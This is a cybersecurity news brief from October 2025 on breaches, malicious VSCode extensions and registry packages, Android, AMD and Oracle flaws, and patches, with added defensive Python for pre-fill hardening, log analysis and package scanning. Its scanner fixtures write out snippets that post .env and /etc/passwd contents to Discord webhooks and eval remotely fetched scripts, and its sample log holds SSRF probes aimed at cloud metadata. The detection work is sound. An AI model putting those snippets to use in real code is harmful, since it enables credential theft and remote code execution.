Svoboda Cybersecurity Brief October 15, 2025
Discord and 5CA dispute source of government ID data breach
Discord blamed its third-party support vendor 5CA for a breach that exposed roughly 70,000 government ID photos, but 5CA denies being hacked and says its own systems were not compromised. The dispute highlights how hard it is to attribute a third-party incident while it is still unfolding, and why vendor contracts should spell out who investigates and who discloses.
Source: DataBreaches.net
New York fines car insurers $14.2M for weak security after breaches
Eight car insurance companies were fined a combined $14.2M for failing to protect driver data, including the driver's license numbers and dates of birth of roughly 825,000 New Yorkers, which were then used to file fraudulent unemployment claims. Attackers abused the "pre-fill" feature of online quote tools, which auto-populates a quote form with stored personal details from minimal input, to harvest the data in bulk.
Impact: Data exposed for fraud and identity theft.
Mitigation: Insurers must strengthen their data security programs, implement MFA, and improve monitoring; pre-fill features in particular should not return sensitive fields until identity is verified, and should be rate-limited so bulk enumeration is slow and visible.
Source: DataBreaches.net
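As an added illustration (not code from any insurer or from the DFS action), the pattern behind the pre-fill abuse and one way to harden it. The record store, field names, the identity-verification flag and the rate-limit thresholds are assumptions chosen for the example: a weak endpoint returns the full record to anyone who knows a name and ZIP; the hardened service gates on prior identity verification, returns only a masked license hint and never the DOB, answers unverified callers identically whether or not a record exists, and caps lookups per client per window while writing an audit trail.

```python
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed sample record store (not real data): what a quoting back-end might hold.
DRIVERS = {
    ("jane doe", "10001"): {"license": "123456789", "dob": "1985-04-12", "vin": "1HGCM82633A004352"},
    ("john roe", "10002"): {"license": "987654321", "dob": "1979-11-30", "vin": "2T1BURHE5JC012345"},
}


def prefill_weak(name, zip_code):
    """The abused pattern: anyone who guesses a name and ZIP gets the full record back,
    with no identity check and no limit on how many lookups one client may make."""
    rec = DRIVERS.get((name.strip().lower(), zip_code))
    return dict(rec) if rec else None


def mask_license(number, keep=4):
    """Return only the last `keep` characters, enough for the user to confirm it is theirs."""
    return "*" * (len(number) - keep) + number[-keep:]


class PrefillService:
    """Hardened pre-fill (assumed design, not any insurer's implementation):
    * identity must already be verified out of band before any stored field is returned;
    * license numbers come back masked and the DOB is never pre-filled at all;
    * unverified callers get one fixed response, so a hit and a miss look the same;
    * lookups per client are capped per time window, so enumeration is slow and audited."""

    def __init__(self, max_lookups=5, window=timedelta(minutes=10)):
        self.max_lookups = max_lookups
        self.window = window
        self._lookups = defaultdict(list)   # client_id -> timestamps of recent lookups
        self.audit = []                      # (event, client_id) tuples for monitoring

    def _over_limit(self, client_id, now):
        # Every call counts, verified or not, so unverified probing burns the budget too.
        recent = [t for t in self._lookups[client_id] if now - t < self.window]
        recent.append(now)
        self._lookups[client_id] = recent
        return len(recent) > self.max_lookups

    def prefill(self, client_id, name, zip_code, identity_verified, now=None):
        now = now or datetime.now(timezone.utc)
        if self._over_limit(client_id, now):
            self.audit.append(("rate_limited", client_id))
            return {"error": "too_many_requests"}
        if not identity_verified:
            self.audit.append(("unverified_prefill_attempt", client_id))
            return {"error": "verification_required"}
        rec = DRIVERS.get((name.strip().lower(), zip_code))
        if rec is None:
            self.audit.append(("no_record", client_id))
            return {}
        self.audit.append(("prefill", client_id))
        return {"license_hint": mask_license(rec["license"]), "vin": rec["vin"]}


if __name__ == "__main__":
    print("weak:", prefill_weak("Jane Doe", "10001"))
    svc = PrefillService(max_lookups=3)
    print("unverified:", svc.prefill("c1", "Jane Doe", "10001", identity_verified=False))
    print("verified:", svc.prefill("c1", "Jane Doe", "10001", identity_verified=True))
    print("audit:", svc.audit)
```

The audit list is what a monitoring pipeline should consume: a single client producing many rate_limited or unverified_prefill_attempt events is the enumeration behaviour the DFS action describes.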
Malicious VSCode extensions steal crypto and code via OpenVSX
The TigerJack group published malicious extensions (including "C++ Playground" and "HTTP Format") on the OpenVSX registry; they steal source code and mine cryptocurrency on the developer's machine. The extensions exfiltrate through Discord webhooks and execute arbitrary code by fetching scripts from remote servers, so their behaviour can change after installation.
Impact: Code theft, crypto mining, and backdoor access to developer workstations.
Mitigation: Verify extension publishers before installing; watch for unusual CPU usage and unexpected outbound connections from the editor process.
Source: BleepingComputer
Pixnapping Android flaw steals 2FA codes pixel-by-pixel
A new side-channel attack, Pixnapping (CVE-2025-48561), combines the GPU.zip graphics-compression side channel with Android intents to read 2FA codes, emails, and messages from apps such as Google Authenticator one pixel at a time. It works on fully patched Pixel and Samsung devices.
Impact: A malicious app with no special permissions can recover on-screen content belonging to other apps.
Mitigation: Apply the Android patch Google has scheduled for December 2025 once it ships; as an interim measure, disable blur effects in Developer options.
Source: BleepingComputer
HyperBunker raises $925K for anti-ransomware hardware
Startup HyperBunker is developing an immutable, air-gapped storage device intended to keep critical data out of reach of ransomware. Unlike conventional backups, it aims to prevent tampering through hardware isolation and encryption rather than software access controls.
Source: SecurityWeek
Microsoft fixes 172 flaws, ends Windows 10 support
October Patch Tuesday addresses 172 flaws, including two actively exploited zero-days: CVE-2025-24990, in the legacy Agere modem driver (ltmdm64.sys), which Microsoft is removing from Windows rather than patching, so hardware that depends on it will stop working; and CVE-2025-59230, a privilege escalation in the Remote Access Connection Manager (RasMan). Windows 10 reaches end of support; consumer Extended Security Updates (ESU) cover one additional year for $30.
Impact: Both zero-days are being exploited in the wild, and Windows 10 hosts without ESU will receive no further fixes.
Mitigation: Upgrade to Windows 11 or enroll in ESU.
Source: KrebsOnSecurity
RMPocalypse flaw breaks AMD SEV-SNP confidential computing
CVE-2025-0033 (CVSS 5.9), dubbed RMPocalypse, lets a malicious hypervisor write to the Reverse Map Table (RMP) while it is being initialized, corrupting the structure SEV-SNP relies on to enforce guest memory integrity. Affected: AMD EPYC 7003 through 9005 series.
Impact: Loss of VM isolation and data confidentiality for SEV-SNP guests; the hypervisor, which SEV-SNP is designed to distrust, regains the ability to read and tamper with guest memory.
Mitigation: Apply BIOS/firmware updates from OEMs as they incorporate AMD's fix; Azure Confidential Computing patches are pending.
Source: The Hacker News
Chinese hackers abuse ArcGIS geo-mapping tool as backdoor
Flax Typhoon, a China-linked APT, turned an internet-facing ArcGIS Server into a backdoor by deploying a malicious Server Object Extension (SOE) for persistent access, then used SoftEther VPN for lateral movement. Targets included IT administrators' workstations for credential theft.
Impact: Long-term espionage and network compromise from a component that looks like a legitimate GIS customisation.
Mitigation: Inventory and monitor ArcGIS SOE deployments (a new or unexpected extension on a public-facing server is a strong signal); restrict and audit ArcGIS administrator access; look for SoftEther VPN binaries on hosts with no business need for them.
Source: The Hacker News
Oracle silently fixes EBS zero-day exploited by ShinyHunters
Oracle quietly patched CVE-2025-61884, a server-side request forgery (SSRF) in the Oracle E-Business Suite Configurator component, after an exploit for it was leaked by the ShinyHunters group. The Clop extortion gang has separately been exploiting CVE-2025-61882 in the same product. Confusion persists over which bug belongs to which exploit chain.
Impact: Unauthenticated access to sensitive data.
Mitigation: Apply Oracle's fix immediately; if patching must be delayed, block external access to /configurator/UiServlet at the web tier and review access logs for requests to that path.
Source: BleepingComputer
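The mitigation above names the /configurator/UiServlet path; the following is an added example (not from BleepingComputer, Oracle or any exploit) of checking web-tier access logs for requests to it. It parses Apache/nginx combined-format lines, flags every hit on the watched path regardless of case, and separately calls out requests whose query string carries a URL, especially one pointing at a loopback, private or link-local address, which is the general shape of an SSRF probe. The log lines are constructed, and the "URL in the query string" heuristic and the parameter names are assumptions, not a description of the actual CVE-2025-61884 exploit.

```python
import re
from collections import Counter
from ipaddress import ip_address
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" access-log format (assumed; adjust for other formats).
LOG_RX = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')

WATCH_PATH = "/configurator/UiServlet"          # path named in the mitigation advice
URL_RX = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)  # query value that is itself a URL

# Constructed sample log (documentation IPs; the query parameter names are arbitrary).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Oct/2025:03:14:22 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 5123
203.0.113.7 - - [12/Oct/2025:03:14:25 +0000] "GET /configurator/UiServlet HTTP/1.1" 200 812
198.51.100.9 - - [12/Oct/2025:03:15:01 +0000] "POST /configurator/UiServlet?param=http://169.254.169.254/latest/meta-data/ HTTP/1.1" 302 0
198.51.100.9 - - [12/Oct/2025:03:15:03 +0000] "GET /configurator/uiservlet?x=https://attacker.example/cb HTTP/1.1" 404 214
192.0.2.44 - - [12/Oct/2025:03:16:40 +0000] "GET /OA_HTML/RF.jsp HTTP/1.1" 200 9980
"""


def parse_line(line):
    """Return the log fields as a dict, or None for lines that do not match the format."""
    m = LOG_RX.match(line)
    return m.groupdict() if m else None


def _is_internal_host(host):
    """True for loopback/private/link-local targets (cloud metadata, internal services)."""
    try:
        return not ip_address(host).is_global
    except ValueError:
        return host == "localhost" or host.endswith((".internal", ".local"))


def analyze(lines):
    """Collect every request to the watched path (case-insensitive, so probing of path
    variants is not missed), note which query values are URLs and whether any of them
    points at an internal address, and count hits per source IP."""
    hits, by_ip = [], Counter()
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        parts = urlsplit(rec["target"])
        if not parts.path.lower().startswith(WATCH_PATH.lower()):
            continue
        url_params = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
                      if URL_RX.match(v)]
        internal = any(_is_internal_host(urlsplit(v).hostname or "") for _, v in url_params)
        hits.append({**rec, "url_params": url_params, "internal_target": internal})
        by_ip[rec["ip"]] += 1
    probes = sum(1 for h in hits if h["url_params"])
    return {"hits": hits, "by_ip": by_ip, "probe_count": probes}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG.splitlines())
    for h in report["hits"]:
        flag = "INTERNAL-TARGET" if h["internal_target"] else ("url-param" if h["url_params"] else "")
        print(h["ip"], h["ts"], h["method"], h["target"], h["status"], flag)
    print("hits per IP:", dict(report["by_ip"]), "probe-shaped requests:", report["probe_count"])
```

Any hit on the path from an external address is worth a look if the servlet was never meant to be reachable from the internet; a request whose parameter value points at 169.254.169.254 or a private range is the one to escalate first.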
npm, PyPI, and RubyGems packages exfiltrate data to Discord
Malicious packages on npm (mysql-dumpdiscord), PyPI (malinssx) and RubyGems (sqlcommenter_rails) use Discord webhooks as a free, TLS-wrapped exfiltration channel for .env files, /etc/passwd and host fingerprinting data. Separately, the North Korea-linked Contagious Interview campaign has flooded npm with 338 fake packages.
Impact: Credential theft and supply chain compromise.
Mitigation: Audit third-party dependencies before adding them; alert on outbound connections to discord.com/api/webhooks from build, CI and developer hosts, which rarely have a legitimate reason to post there.
Source: The Hacker News
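Both the TigerJack extensions above and these registry packages share one tell: a Discord webhook URL sitting next to code that reads secrets or pulls a script from the network. The following is an added example (not code from any of the cited reports) of a scanner that walks a directory of installed extensions or packages and flags that combination. The indicator regexes are assumed heuristics tuned to the behaviours described (webhook URLs, reads of .env-style files or /etc/passwd, an eval/exec sink close to a network fetch), and the sample package tree it builds is constructed inline; real tooling would also want to inspect minified bundles and install-time scripts.

```python
import os
import re
import tempfile

# Indicator regexes (assumed heuristics, not signatures from any vendor report).
INDICATORS = {
    "discord_webhook": re.compile(
        r"https?://(?:discord|discordapp)\.com/api/webhooks/\d+/[A-Za-z0-9_-]+"),
    "reads_env_file": re.compile(r"""['"](?:\.env|\.npmrc|\.pypirc)['"]"""),
    "reads_etc_passwd": re.compile(r"/etc/passwd"),
    # An eval/exec-style sink within ~80 chars of a network fetch: "download and run".
    "remote_script_exec": re.compile(
        r"\b(?:eval|exec|Function|child_process\.exec|execSync|subprocess\.run)\s*\(.{0,80}?"
        r"(?:fetch|https?\.get|requests\.get|urlopen|Net::HTTP)", re.S),
}
SCAN_SUFFIXES = (".js", ".mjs", ".ts", ".py", ".rb", ".json", ".sh")


def scan_tree(root):
    """Walk root (one subdirectory per extension/package) and return
    {package_dir: [(indicator, relative_file_path), ...]} for every indicator that fires."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.endswith(SCAN_SUFFIXES):
                continue
            full = os.path.join(dirpath, fname)
            rel = os.path.relpath(full, root)
            package = rel.split(os.sep)[0]
            with open(full, "r", encoding="utf-8", errors="ignore") as fh:
                text = fh.read()
            for name, rx in INDICATORS.items():
                if rx.search(text):
                    findings.setdefault(package, []).append((name, rel))
    return findings


def verdict(hits):
    """Classify one package's hit list. A webhook next to a credential/file read or a
    remote-code sink is treated as likely exfiltration; a lone webhook or lone remote
    fetch-and-run is only suspicious (some legitimate tools post notifications to Discord)."""
    kinds = {k for k, _ in hits}
    if "discord_webhook" in kinds and kinds & {"reads_env_file", "reads_etc_passwd", "remote_script_exec"}:
        return "likely_exfil"
    if "discord_webhook" in kinds or "remote_script_exec" in kinds:
        return "suspicious"
    return "clean"


def build_sample_tree():
    """Write a constructed sample tree (look-alike names, not the real packages) into a
    temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="ext_scan_")
    samples = {
        "cpp-playground-lookalike/out/extension.js": (
            'const fs = require("fs");\n'
            'const HOOK = "https://discord.com/api/webhooks/123456789012345678/AbCd-EfGh_ijk";\n'
            'const env = fs.readFileSync(require("path").join(process.env.HOME, ".env"), "utf8");\n'
            'fetch(HOOK, { method: "POST", body: JSON.stringify({ content: env }) });\n'
            'setInterval(async () => { eval(await (await fetch("https://example.invalid/u.js")).text()); }, 1200000);\n'
        ),
        "dumpdiscord-lookalike/lib/dump.py": (
            'import requests\n'
            'HOOK = "https://discordapp.com/api/webhooks/987654321098765432/zyxw-9876_abc"\n'
            'requests.post(HOOK, json={"content": open("/etc/passwd").read()})\n'
        ),
        "clean-formatter/index.js": (
            'const axios = require("axios");\n'
            'module.exports = () => axios.get("https://api.github.com/repos/x/y/releases/latest");\n'
        ),
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    results = scan_tree(root)
    for package in sorted(os.listdir(root)):
        hits = results.get(package, [])
        print(f"{package}: {verdict(hits)}", *(f"  {k} in {f}" for k, f in hits), sep="\n")
```

Point scan_tree at ~/.vscode/extensions, ~/.vscode-oss/extensions, a project's node_modules or a virtualenv's site-packages; the verdict tiers keep a single notification webhook from drowning out the packages that also read secrets or pull code at runtime.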
TA585 deploys MonsterV2 malware via phishing campaigns
TA585 uses IRS-themed lures and fake CAPTCHA overlays to deliver the MonsterV2 RAT, which steals data and provides hidden VNC (HVNC) remote control of the victim's desktop. The malware is sold for $2,000/month on underground forums.
Impact: Data exfiltration and covert remote control.
Mitigation: Train users to recognise phishing and "verify you are human" prompts that ask them to paste commands; block or alert on PowerShell launched from the Run dialog or with hidden or encoded arguments.
Source: The Hacker News
Secure Boot bypass in 200K Framework Linux laptops
Signed UEFI shells shipped with Framework's Linux laptops include a memory-modify (mm) command; an attacker with local access can use it to overwrite the in-memory gSecurity2 protocol pointer so that image signature checks are skipped, disabling Secure Boot for anything loaded afterwards. Framework has released fixes for most models; the vulnerable shells need to be revoked, not just replaced, or an attacker can simply reuse the old signed binary.
Impact: Bootkit persistence and full OS compromise that survives reinstalls.
Mitigation: Apply the firmware updates; restrict physical and local administrative access, and set a firmware password so the UEFI shell cannot be launched from the boot menu.
Source: BleepingComputer
SAP patches critical flaws in NetWeaver and SRM
CVE-2025-42937 (directory traversal) and CVE-2025-42910 (unrestricted file upload) are fixed in this month's SAP Security Notes for NetWeaver and SRM. No in-the-wild exploitation has been reported.
Impact: Arbitrary code execution and file manipulation on affected SAP systems.
Mitigation: Apply the SAP Security Notes; until then, restrict administrative and upload-capable access to trusted networks.
Source: SecurityWeek
Harvard confirms Oracle EBS zero-day breach
Harvard is the first confirmed victim of Clop's Oracle E-Business Suite campaign, with 1.3TB of its data leaked. The attackers exploited unpatched EBS vulnerabilities to steal financial and HR data.
Impact: Breach of administrative systems holding financial and personnel records.
Mitigation: Keep EBS instances off the public internet where possible; apply Oracle's emergency patches; audit access logs for signs of the EBS exploit chain.
Source: SecurityWeek